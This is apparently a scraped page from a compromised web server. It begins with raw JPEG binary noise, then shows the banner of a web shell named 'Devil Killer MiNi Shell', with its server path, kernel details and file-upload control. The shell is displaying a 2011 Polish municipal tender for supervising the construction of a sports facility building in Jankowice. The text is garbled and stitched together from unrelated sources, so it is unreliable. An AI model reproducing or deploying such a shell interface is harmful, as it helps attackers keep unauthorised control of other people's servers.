JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110510/106436-N-2011.html

<p class="kh_header"><b>Jankowice: Pełnienie funkcji Inwestora Zastępczego nad realizacją zadania inwestycyjnego pn.: Budowa budynku zaplecza gminnego obiektu sportowego w Jankowicach przy ul. Sportowej 2A</b><br>
<b>Numer ogłoszenia: 106436 - 2011; data zamieszczenia: 10.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świerklany , ul. Świerklańska 54, 44-264 Jankowice, woj. śląskie, tel. 032 4327500, faks 032 4327509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swierklany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inwestora Zastępczego nad realizacją zadania inwestycyjnego pn.: Budowa budynku zaplecza gminnego obiektu sportowego w Jankowicach przy ul. Sportowej 2A.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Pełnienie funkcji Inwestora Zastępczego nad realizacją zadania inwestycyjnego pn.: Budowa budynku zaplecza gminnego obiektu sportowego w Jankowicach przy ul. Sportowej 2A.
1.1.	Inwestor Zastępczy pełniąc czynności zastępstwa inwestycyjnego działa w imieniu własnym i na rzecz Zamawiającego.
1.2.	Inwestor Zastępczy ponosi wobec Zamawiającego odpowiedzialność za wyrządzenie szkody będącej następstwem nienależytego wykonania czynności objętych niniejszą umową.
1.3.	Inwestor Zastępczy ponosi pełną odpowiedzialność cywilną za szkody wynikłe z nienależytego wykonania nadzoru.

2.	Do podstawowych obowiązków Inwestora Zastępczego należy w szczególności:
2.1.	reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej poprzez obecność na budowie w niezbędnym zakresie,
2.2.	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i nie dopuszczonych do stosowania w budownictwie,
2.3.	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru obiektu budowlanego i przekazaniu go do użytkowania zarówno ETAPU I (przejściowego) jak i ETAPU II (końcowego),
2.4.	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad a także kontrolowanie rozliczeń budowy.

3.	Do szczegółowych obowiązków Inwestora Zastępczego należy w szczególności:
3.1.	zgłaszanie projektantowi zastrzeżeń do projektu zgłoszonych przez wykonawcę robót lub Zamawiającego i dokonywanie z nim stosownych uzgodnień i wyjaśnień,
3.2.	koordynacja pomiędzy kierownictwem budowy a projektantem w sprawie pełnienia nadzoru autorskiego,
3.3.	przekazanie wykonawcy (wykonawcom) terenu budowy wespół z Zamawiającym,
3.4.	sprawowanie funkcji nadzoru inwestorskiego zgodnie z obowiązującymi przepisami prawa budowlanego w zakresie wszystkich koniecznych specjalności budowlanych i technologicznych poprzez zapewnienie dyspozycyjności na placu budowy,
3.5.	wyznaczenie spośród inspektorów branżowych koordynatora ich czynności na budowie,
3.6.	sprawdzanie, weryfikacja i zatwierdzanie kalkulacji szczegółowych i kosztorysów powykonawczych przedkładanych przez wykonawcę robót,
3.7.	kontrolowanie terminowości, jakości, ilości  i wartości prowadzonych robót, potwierdzanie protokołów odbioru urządzeń i przyjęcia materiałów z podaniem miejsca ich składowania,
3.8.	sprawdzanie faktur wykonawców oraz dokumentów potrzebnych do rozliczenia robót (inwestycji) i przedłożenie ich Zamawiającemu do zapłaty w terminie ustalonym w umowie z wykonawcą,
3.9.	dokonywanie odbiorów częściowych zrealizowanych robót, robót zanikowych i odbioru końcowego,
3.10.	dokonywanie czynności odbioru końcowego inwestycji lub jej części (odbiory częściowe) według zasad określonych w umowie z wykonawcą i odbioru ostatecznego przy każdorazowym udziale Zamawiającego i użytkownika obiektu.

4.	W ramach tych czynności Inwestor Zastępczy zobowiązuje się do:
4.1.	stwierdzenia gotowości odbioru i powołania komisji odbioru,
4.2.	zorganizowania odbioru i przekazania zadania lub jego etapów,
4.3.	przekazania Inwestorowi protokołów odbioru oraz dokumentacji powykonawczej przygotowanej przez wykonawcę robót,
4.4.	uzyskanie pozwolenia na użytkowanie obiektu (ETAP I + ETAP II),
4.5.	sporządzenia pełnego końcowego rozliczenia finansowego realizowanego zadania,
4.6.	uczestniczenia w kontrolach prowadzonych u Zamawiającego przez upoważnione do tego podmioty,
4.7.	na wniosek Zamawiającego  opiniowania i sprawdzania dokumentacji projektowej w zakresie przyjętych rozwiązań, ich wykonalności, technologii robót etc.,
4.8.	opiniowania i przedstawienia do akceptacji przez Zamawiającego wszelkich zmian do dokumentacji oraz sprawdzenia i opiniowania rysunków roboczych Wykonawcy i wprowadzania korekty tych rysunków. Inwestor Zastępczy sprawdza także wytyczanie robót, stopień zagęszczenia gruntu przed fundamentowaniem oraz wydaje Wykonawcy dyspozycje w tych sprawach,
4.9.	weryfikowania, zatwierdzania i uaktualniania harmonogramu Wykonawcom robót,
4.10.	sprawdzania i zatwierdzania zestawień dotyczących urządzeń, sprzętu i siły roboczej Wykonawcy oraz rachunków, faktur i innych wykazów,
4.11.	odbioru jakościowego materiałów dostarczonych przez Wykonawcę na plac budowy i udzielenia zezwolenia na ich użycie do wykonania robót,
4.12.	nadzoru nad wykonywanymi robotami w zakresie ich zgodności z dokumentacja techniczną, normami, wymogami Prawa Budowlanego i warunkami poszczególnych umów z Wykonawcami robót,
4.13.	kontrolowania i zatwierdzania obmiarów robót,
4.14.	kontrolowania terminowości wykonania oraz jakości robót na budowie,
4.15.	sprawdzania kalkulacji szczegółowych i kosztorysów powykonawczych przedkładanych przez wykonawców,
4.16.	nadzoru nad wykorzystaniem przez wykonawców infrastruktury technicznej gminy (w szczególności dróg, placów składowych) oraz rozdział kosztów związanych z ich utrzymaniem i przywróceniem do stanu pierwotnego,
4.17.	pisemnego informowania Zamawiającego o postępie realizacji zadania oraz przekazywanie miesięcznych meldunków o przebiegu realizacji rozliczenia kosztów,
4.18.	pisemnego informowania Zamawiającego o występowaniu na budowie sytuacji hamujących postęp robót i innych zagrożeniach,
4.19.	opracowywania wniosków dotyczących konieczności wykonania robót dodatkowych i zamiennych oraz uzyskanie w tej kwestii pisemnej akceptacji Zamawiającego,
4.20.	opiniowania wniosków wykonawców w sprawie zmiany sposobu wykonania robót budowlanych, w tym zmiany materiałów, maszyn, urządzeń i uzgadniania tych zmian w razie konieczności z jednostką projektową,
4.21.	informowania Zamawiającego o  wadach w dokumentacji projektowej natychmiast po ich wykryciu,
4.22.	sporządzania i przekazywania Zamawiającemu bieżącej sprawozdawczości i innych informacji wymaganych przez Zamawiającego,
4.23.	organizowania przeglądów gwarancyjnych,
4.24.	wykonywanie przysługujących Zamawiającemu praw wynikających z udzielonych przez wykonawców robót rękojmi i gwarancji,
4.25.	zawiadamiania wykonawców robót o stwierdzonych wadach  w okresie gwarancji i rękojmi,
4.26.	sporządzania wniosków o zapłatę kar umownych z tytułu stwierdzonych wad oraz za zwłokę w usunięciu usterek stwierdzonych w okresie gwarancji i rękojmi,
4.27.	w wypadku wykrycia wad, których nie da się usunąć, zaliczenia kwoty, o którą z tego tytułu obniża się wartość inwestycji z zabezpieczenia należytego wykonania umowy,
4.28.	rozliczenia zabezpieczenia należytego wykonania umowy,
4.29.	spisania protokołu pogwarancyjnego,
4.30.	uczestniczenia w komisjach powołanych do oceny jakości robót  w okresie gwarancji i rękojmi,
4.31.	rozliczania inwestycji wraz z przygotowaniem danych do sporządzenia dowodów księgowych odbioru technicznego i środka trwałego OT,
4.32.	opracowanie opinii dotyczących wad przedmiotu umowy uznanych za nie nadające się do usunięcia oraz wnioskowanie o obniżenie wynagrodzenia Wykonawcy z określeniem utraty wartości robót  i kwot obniżonego wynagrodzenia za roboty,
4.33.	przekazania Inwestorowi po dokonaniu odbioru końcowego Inwestycji 4.34.	złożenia oświadczenia o kompleksowym wykonaniu inwestycji i dostarczenie wszelkich niezbędnych dokumentów,
4.35.	dostarczenia Zamawiającemu oświadczeń o usunięciu przez wykonawców usterek stwierdzonych przy odbiorze zgodnie z terminami podanymi w końcowym protokole odbioru inwestycji,
4.36.	dostarczenia Zamawiającemu kosztorysów powykonawczych w układzie ofertowym po ich zatwierdzeniu,
4.37.	uczestniczenia w spotkaniach i naradach organizowanych przez Inwestora,
4.38.	rozwiązywania problemów terenowo - prawnych wynikłych w trakcie realizacji robót,
4.39.	przedłużenia polisy ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej w razie jej wygaśnięcia,
4.40.	sporządzania dokumentów służących w szczególności rozliczeniu robót oraz sprawozdawczości  w formie i zakresie wymaganym przez Zamawiającego,
4.41.	udostępniania Zamawiającemu dokumentów związanych z realizacją umowy,
4.42.	aktywnego uczestniczenia wraz z Zamawiającym przy ewentualnym sporządzaniu wniosków o dofinansowanie inwestycji sportowych.

5.	Ogólna charakterystyka zakresu nadzorowanych robót:
W zakres nadzorowanego zadania wchodzą roboty przygotowawcze terenu pod budowę, wzniesienie kompletnego obiektu budowlanego, wykonanie instalacji budowlanych, roboty wykończeniowe.
Pożądana jest wizja lokalna na przyszłym placu budowy - zaleca się aby Wykonawca dokonał wizji lokalnej na terenie przewidzianej inwestycji oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania prawidłowej oferty oraz podpisania umowy.
5.1.	w zakres ETAP - u I wchodzą:
a)	roboty przygotowawcze pod budowę obiektu podstawowego:
-	roboty ziemne dla robót rozbiórkowych 
-	roboty rozbiórkowe 
-	kanalizacja sanitarna - przyłącze kanalizacyjne 
-	zbiornik bezodpływowy dla ścieków sanitarnych z PEHD - V=16 m3
-	zbiornik bezodpływowy dla deszczówki z PEHD - V=8 m3 z odcinkiem przyłącza
-	przebudowa sieci wodociągowej + przyłącze do starego zaplecza
-	przebudowa przyłącza energetycznego kablowego - GLZ
-	przebudowa linii kablowej telefonicznej 
-	zabezpieczenie istniejącego zaplecza w trakcie wyk. robót ziemnych segm. 1
-	roboty drogowe tymczasowe - tymczasowy dojazd i dojście do szamba i starego zaplecza
b)	roboty budowlane konstrukcyjne: 
-	roboty ziemne 
-	fundamenty - ławy, stopy, ściany i przepona - segm.1 i 2
-	konstrukcja stalowa segmentu 1 
-	obudowa konstr. stalowej płytami warstwowymi dwustronnymi - segm. 1
-	konstrukcja segmentu 2 
-	konstrukcja dachu z pokryciem i obróbkami blacharskimi - segm. 2
c)	instalacje wewnętrzne:
-	instalacja wodociągowa wody zimnej, ciepłej i cyrkulacji
-	rurociągi z izolacją i zaworami 
-	armatura wodna 
-	kanalizacja sanitarna 
-	rurociągi kanalizacyjne 
-	armatura kanalizacji sanitarnej 
-	montowane wyposażenie sanitariatów 
-	instalacja C.O
-	kotłownia 
-	technologa 
-	układ uzupełnienia zładu 
-	układ przygotowania ciepłej wody użytkowej 
-	elementy układu AKPiA 
-	rurociągi i pozostałe elementy kotłowni 
-	instalacje elektryczne 
-	rury instalacyjne, przewody i kable 
-	tablice, osprzęt i aparatura 
-	instalacja alarmowa 
-	oprawy oświetleniowe 
-	instalacja odgromowa 
-	pomiary 
-	wentylacja mechaniczna 
-	zespół wentylacyjny ZNW-1 
-	indywidualne zespoły wywiewne 
d)	roboty wykończeniowe: 
-	izolacje i podłoża pod posadzkowe 
-	tynki wewnętrzne - segm. 2 techniczny 
-	tynki (gładzie gipsowe) segment 1. 
-	elewacja - segm. 2 techniczny 
-	okładziny ścian i ścianki działowe w systemie płyt FARMACELL - segm. 1
-	okładziny ceramiczne ścian
-	okładziny stropów płytami gipsowo -włóknowymi typu FARMACELL - segm. 1
-	roboty malarskie 
-	segment 2 - techniczny 
-	segment 1
-	posadzki 
-	okna 
-	drzwi zewnętrzne 
-	drzwi wewnętrzne 
-	zabudowy sanitarne i socjalne 
e)	instalacje zewnętrzne: 
-	kanalizacja deszczowa 
-	system rozsączający wodę deszczową 
-	kanały deszczowe 
-	przebudowa przyłącza energetycznego kablowego - GLZ
-	przyłącze teletechniczne 
f)	zagospodarowanie terenu: 
-		roboty drogowe 
-	roboty drogowe 
-	jezdnie i parkingi 
-	chodniki i opaski 
-	ogrodzenie 
-	tereny zielone 
	g)	dostawa wyposażenia w sprzęt AGD

5.2.	w zakres ETAP - u II wchodzą:
a)	roboty przygotowawcze pod budowę obiektu podstawowego: 
-	rozbiórka (wyburzenie) starego budynku zaplecza 
-	rozbiórka płyt elewacyjnych wraz z konstrukcją segmentu pierwszego w osi 6 
-	rozbiórka fundamentów segmentu pierwszego w osi 6 - A-E 
-	skrócenie ścianki z grodzic do poziomu 274,35 w rejonie osi 6 - A-E 
-	kanalizacja sanitarna - tymczasowy odbiór ścieków do czasu wykonania stanu 0 segmentu 3
b)	roboty budowlane konstrukcyjne: 
-	roboty ziemne 
-	fundamenty - ławy, stopy, ściany i przepona 
-	konstrukcja stalowa segmentu 3 
-	obudowa konstr. stalowej płytami warstwowymi dwustronnymi - segm. 3 
c)	instalacje wewnętrzne: 
-	instalacja wodociągowa wody zimnej, ciepłej i cyrkulacji 
-	rurociągi z izolacją i zaworami 
-	armatura wodna 
-	kanalizacja sanitarna 
-	rurociągi kanalizacyjne 
-	armatura kanalizacji sanitarnej 
-	montowane wyposażenie sanitariatów ogólnodostępnych 
-	montowane wyposażenie sanitariatu dla osób niepełnosprawnych 
-	instalacja C.O. 
-	instalacje elektryczne 
-	rury instalacyjne, przewody i kable
-	tablice, osprzęt i aparatura 
-	instalacja alarmowa 
-	oprawy oświetleniowe 
-	instalacja odgromowa 
-	pomiary 
-	wentylacja mechaniczna 
-	zespół wentylacyjny ZNW-2 
-	indywidualne zespoły wywiewne 
d)	roboty wykończeniowe: 
-	izolacje i podłoża pod posadzkowe 
-	okładziny ścian i ścianki działowe w systemie płyt FARMACELL 
-	okładziny stropów płytami gipsowo -włóknowymi typu FARMACELL 
-	tynki (gładzie gipsowe) 
-	okładziny ceramiczne ścian 
-	roboty malarskie 
-	posadzki 
-	okna 
-	drzwi zewnętrzne 
-	drzwi wewnętrzne 
-	zabudowy sanitarne 
e)	instalacje zewnętrzne:
-	kanalizacja deszczowa 
f)	zagospodarowanie terenu: 
-	ogrodzenie 
-	roboty drogowe 
-	tereny zielone 
g)	dostawa wyposażenia w sprzęt AGD

5.3.	parametry techniczne  budynku zaplecza sportowego:

ETAP I - SEGMENT 1
Powierzchnia zabudowy Pz = 336,65 m2
Kubatura brutto V = 1643,97 m3
ETAP I - SEGMENT 2
Powierzchnia zabudowy Pz = 87,31 m2
Kubatura brutto V = 428,61 m3
ETAP II - SEGMENT 3
Powierzchnia zabudowy Pz = 282,41 m2
Powierzchnia całkowita Pc = 282,41 m2
Kubatura brutto V = 1378,58 m3
RAZEM - SEGMENTY 1+2+3
Powierzchnia zabudowy Pz = 710,25 m2
Kubatura brutto V = 3451,16 m3

6.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w załącznikach  do niniejszej SIWZ: 
6.1.	dokumentacji i projektowej,
6.2.	specyfikacji technicznej wykonania i odbioru robót, 
6.3.	ogólnych warunkach umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 3.000,00 zł. (słownie: trzy tysiące złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, pełnieniem funkcji inwestora zastępczego dla co najmniej 2 inwestycji o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia, tzn. pełnić funkcję inwestora zastępczego dla: 
a)	budowy co najmniej 1 obiektu o konstrukcji stalowej, o wartości przedmiotu usługi co najmniej 50.000,00 PLN brutto - każde zadanie 
oraz: 
b)	budowy co najmniej 1 obiektu kubaturowego o konstrukcji tradycyjnej murowanej, o wartości przedmiotu usługi co najmniej 50.000,00 PLN brutto - każde zadanie.
Wykonawca winien załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie. 
Wartości podane w dokumentach potwierdzających spełnianie warunku w walutach innych niż w PLN, Wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia faktury końcowej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone, tj.: 	
a)	inspektorem nadzoru branży budowlanej - posiadającym uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji szwajcarskiej z zastrzeżeniem art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2010.243.1623 ze zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2008.63.394),
b)	inspektorem nadzoru branży elektrycznej - posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji szwajcarskiej z zastrzeżeniem art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2010.243.1623 ze zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2008.63.394),
c)	inspektorem nadzoru branży sanitarnej - posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji szwajcarskiej z zastrzeżeniem art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2010.243.1623 ze zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2008.63.394). 
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem zamówienia w wysokości min. 100.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

